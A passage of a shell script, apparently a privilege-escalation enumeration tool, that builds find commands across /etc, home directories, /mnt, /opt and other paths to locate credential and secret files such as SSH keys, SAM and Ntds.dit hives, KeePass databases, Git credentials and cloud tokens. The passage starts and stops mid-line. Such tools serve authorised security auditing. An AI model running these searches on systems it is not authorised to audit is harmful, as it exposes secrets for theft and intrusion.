\"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*knockd*\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"ssh*config\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"sess_*\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" 